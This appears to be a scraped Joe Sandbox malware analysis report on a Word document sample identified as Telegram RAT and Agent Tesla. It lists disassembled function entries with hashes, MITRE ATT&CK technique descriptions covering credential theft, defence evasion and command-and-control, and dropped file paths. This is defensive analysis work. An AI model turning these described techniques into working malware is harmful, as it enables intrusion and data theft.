Function 015A57EF Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 015A587A

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2fd6a4c7d826ea13ec738ce0ee2d0e22b0e79d4fa8aa59976de788077dafd6e7
Instruction ID: 840bb4fc98ef9e3a121295f744b19f6073d0837c558c560e8591fda4e6d0e440
Opcode Fuzzy Hash: 2fd6a4c7d826ea13ec738ce0ee2d0e22b0e79d4fa8aa59976de788077dafd6e7
Instruction Fuzzy Hash: 182168B0811309CECB10DFA9D848B9EBFF8FB45324F648429D815A7740EB38A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 061B6598 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,061B7545), ref: 061B7628

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 647d86940903e27cb90b18d9e3eed9bbd07fb5cf1de3dc33ee1715452cd51189
Instruction ID: 4a2ec53ae780e1bf6815e103decf9636c963b8b26537d406911bb1f15d53f67d
Opcode Fuzzy Hash: 647d86940903e27cb90b18d9e3eed9bbd07fb5cf1de3dc33ee1715452cd51189
Instruction Fuzzy Hash: 472135B1C0065A9BCB50CF9AC4447EEFBF4EB88324F008529D814B7240E734A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 015A5800 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 015A587A

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 37d3fb939ed58deec42b457b2251e13a95acfa83b89245f3aee0b8087a70eb17
Instruction ID: cbbf94e623d141454f881853d04d0a16da504850e2b480904d834929fbf70672
Opcode Fuzzy Hash: 37d3fb939ed58deec42b457b2251e13a95acfa83b89245f3aee0b8087a70eb17
Instruction Fuzzy Hash: 811133B0911306CEDB10DFA9D808B9EBFF8FB45328F648829D415A7740EB39A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015A0AA0 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 015A0B0E

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: f01803545b26fc25ceee9a8ce593b899fc6580a2a41929e6e07af877921cb873
Instruction ID: dac9c06b0aa8898427b5c5e49252cecf6216480db36912e6259adf39cf42509f
Opcode Fuzzy Hash: f01803545b26fc25ceee9a8ce593b899fc6580a2a41929e6e07af877921cb873
Instruction Fuzzy Hash: D71102B59002499FCB10CF9AC884BDFBBF8FB88324F148819E529A7250D775A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015A0B52 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 015A0BB7

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 24909141c182068c93edcfa7cd3ea87805fd9b224f8bf827f3a8e3af933bf11b
Instruction ID: 29b3d0e3cb355a36fd281f1a03533f934166cfe734b3e10fa9bf57218734b55e
Opcode Fuzzy Hash: 24909141c182068c93edcfa7cd3ea87805fd9b224f8bf827f3a8e3af933bf11b
Instruction Fuzzy Hash: 1C1112B18002498FCB10DF9AD885BDEFBF8FB48328F10885AD518A7340C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015A0B58 Relevance: 1.3, APIs: 1, Instructions: 41sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 015A0BB7

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 68c9fcc69bb6f62caf7df7bfba1f4c09c5b01193877d9a97e63434bc32e29341
Instruction ID: b98f0f2701767212d2cb8452e79d255a843638a573a688a8d0d02b4304e26f6a
Opcode Fuzzy Hash: 68c9fcc69bb6f62caf7df7bfba1f4c09c5b01193877d9a97e63434bc32e29341
Instruction Fuzzy Hash: 201112B08002498FCB10DF9AC484BDEFBF4FB48328F10885AD518A7340C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012ED3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.618985824.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12ed000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6ef99c4f5657c97a7ef59e597411a406a7982fc66129f6e210b8b1fec64355
Instruction ID: adc389ccd4984a0c1d3e1d521a2ccb159ea08ea981d4c15280a8a6dd538dab2c
Opcode Fuzzy Hash: 6c6ef99c4f5657c97a7ef59e597411a406a7982fc66129f6e210b8b1fec64355
Instruction Fuzzy Hash: F42145B1510209DFDB05DF94D8C4B66BFA5FBA4324F60C568EA090B207C336E406CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 012ED4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.618985824.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12ed000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f7bed3126a11539d9a42b78f5861d92d5f30c440fbd1af79139f06214d92553
Instruction ID: fa575d7b34a76bc8cba29153ee85e2a3791340efcc5a6c2438477df3ea7e89c5
Opcode Fuzzy Hash: 9f7bed3126a11539d9a42b78f5861d92d5f30c440fbd1af79139f06214d92553
Instruction Fuzzy Hash: 2A216A75510249DFCF05CF94E9C4B27BFA5FB88328F60C569D9050B206C336D846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012ED3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.618985824.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12ed000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc54eea5d2034d2b657526c747f4f33d5e6b150061098b71267de8d55dafc77
Instruction ID: b931f6c8325139aae598369bf50276781f337b18b9a799a5a16561d6c7f88637
Opcode Fuzzy Hash: 7dc54eea5d2034d2b657526c747f4f33d5e6b150061098b71267de8d55dafc77
Instruction Fuzzy Hash: 8E110376404284CFCF02CF44D5C4B56BFB2FB94320F24C6A9D9480B616C33AE456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012ED4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.618985824.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12ed000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc54eea5d2034d2b657526c747f4f33d5e6b150061098b71267de8d55dafc77
Instruction ID: bad87596a8446a24b3d0fb7338583cff74fe8f5c5ab0cb39156127ea27fda98c
Opcode Fuzzy Hash: 7dc54eea5d2034d2b657526c747f4f33d5e6b150061098b71267de8d55dafc77
Instruction Fuzzy Hash: 5711D376404284CFCF12CF54D9C4B16BFB1FB84324F24C6A9D9450B616C33AD45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment copy_2911022.docx.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PROMZwFp385vXrN.exe.log

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\059BE406-184C-47DB-8766-13F9D87050E0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4B13FC8B.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\70363510.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9A742D9E.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1FCF93C7-36B2-4597-9FFA-7A18301AC743}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BE0195EF-DE76-44B4-A06B-70C1544DDB6A}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\PROMZwFp385vXr[1]

Windows Analysis Report
Payment copy_2911022.docx.doc

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre